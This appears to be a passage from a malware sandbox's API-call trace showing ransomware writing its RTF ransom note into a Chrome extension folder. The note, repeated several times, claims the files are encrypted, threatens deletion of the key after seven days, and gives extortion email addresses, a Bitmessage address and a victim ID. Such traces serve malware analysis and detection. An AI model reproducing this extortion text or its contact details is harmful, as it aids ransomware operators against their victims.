bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.103] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.104] CloseHandle (hObject=0x2ec) returned 1 [0291.104] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\#readme_eman#.rtf")) returned 0xffffffff [0291.104] GetLastError () returned 0x2 [0291.104] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.105] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.105] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.105] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 